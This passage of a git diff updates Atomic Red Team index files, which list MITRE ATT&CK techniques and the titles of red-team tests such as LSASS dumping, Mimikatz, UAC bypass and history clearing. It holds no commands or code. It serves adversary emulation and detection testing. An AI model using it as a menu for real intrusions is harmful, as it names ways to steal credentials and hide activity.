+- [T1560 Archive Collected Data](../../T1560/T1560.md)
+ - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
+ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
+ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
+ - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+- [T1123 Audio Capture](../../T1123/T1123.md)
+ - Atomic Test #1: using device audio capture commandlet [windows]
+- [T1119 Automated Collection](../../T1119/T1119.md)
+ - Atomic Test #1: Automated Collection Command Prompt [windows]
+ - Atomic Test #2: Automated Collection PowerShell [windows]
+ - Atomic Test #3: Recon information for export with PowerShell [windows]
+ - Atomic Test #4: Recon information for export with Command Prompt [windows]
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
+ - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
+ - Atomic Test #4: Collect Clipboard Data via VBA [windows]
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #1: Stage data from Discovery.bat [windows]
+ - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
+- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
+ - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
+- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #5: Windows Screencapture [windows]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -19,7 +155,7 @@
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -77,11 +213,14 @@
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
@@ -95,6 +234,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -137,7 +277,7 @@
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -153,6 +293,9 @@
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
+ - Atomic Test #9: Prevent Powershell History Logging [windows]
+ - Atomic Test #10: Clear Powershell History by Deleting History File [windows]
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
@@ -233,6 +376,7 @@
- Atomic Test #1: Hidden Window [windows]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -324,8 +468,10 @@
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -372,6 +518,8 @@
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
+ - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
+ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -397,7 +545,9 @@
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
@@ -501,6 +651,7 @@
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
@@ -515,6 +666,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -766,56 +918,6 @@
- Atomic Test #2: Malicious User Agents - CMD [windows]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- [T1560 Archive Collected Data](../../T1560/T1560.md)
- - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
-- [T1123 Audio Capture](../../T1123/T1123.md)
- - Atomic Test #1: using device audio capture commandlet [windows]
-- [T1119 Automated Collection](../../T1119/T1119.md)
- - Atomic Test #1: Automated Collection Command Prompt [windows]
- - Atomic Test #2: Automated Collection PowerShell [windows]
- - Atomic Test #3: Recon information for export with PowerShell [windows]
- - Atomic Test #4: Recon information for export with Command Prompt [windows]
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #1: Stage data from Discovery.bat [windows]
- - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
-- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
-- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #5: Windows Screencapture [windows]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# execution
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -865,6 +967,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -877,6 +980,7 @@
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
+ - Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -906,87 +1010,6 @@
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# credential-access
-- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- - Atomic Test #3: Extracting passwords with findstr [windows]
- - Atomic Test #4: Access unattend.xml [windows]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- - Atomic Test #1: Run Chrome-password Collector [windows]
- - Atomic Test #3: LaZagne - Credentials from Browser [windows]
-- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- - Atomic Test #1: Enumeration for Credentials in Registry [windows]
- - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
-- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- - Atomic Test #1: GPP Passwords (findstr) [windows]
- - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- - Atomic Test #1: Request for service tickets [windows]
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- - Atomic Test #1: Dumping LSA Secrets [windows]
-- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- - Atomic Test #1: Windows Credential Editor [windows]
- - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- - Atomic Test #7: LSASS read with pypykatz [windows]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
-- [T1040 Network Sniffing](../../T1040/T1040.md)
- - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- - Atomic Test #4: Windows Internal Packet Capture [windows]
-- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- - Atomic Test #1: Powershell Mimikatz [windows]
- - Atomic Test #2: Gsecdump [windows]
- - Atomic Test #3: Credential Dumping with NPPSpy [windows]
-- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- - Atomic Test #1: Password Cracking with Hashcat [windows]
-- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- - Atomic Test #1: Install and Register Password Filter DLL [windows]
-- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- - Atomic Test #1: Brute Force Credentials [windows]
-- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- - Atomic Test #1: Password Spray all Domain Users [windows]
- - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
-- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- - Atomic Test #1: Private Keys [windows]
-- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- - Atomic Test #2: Registry parse with pypykatz [windows]
- - Atomic Test #3: esentutl.exe SAM copy [windows]
- - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# lateral-movement
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 24b3b88f..bbd79b46 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -1,53 +1,63 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
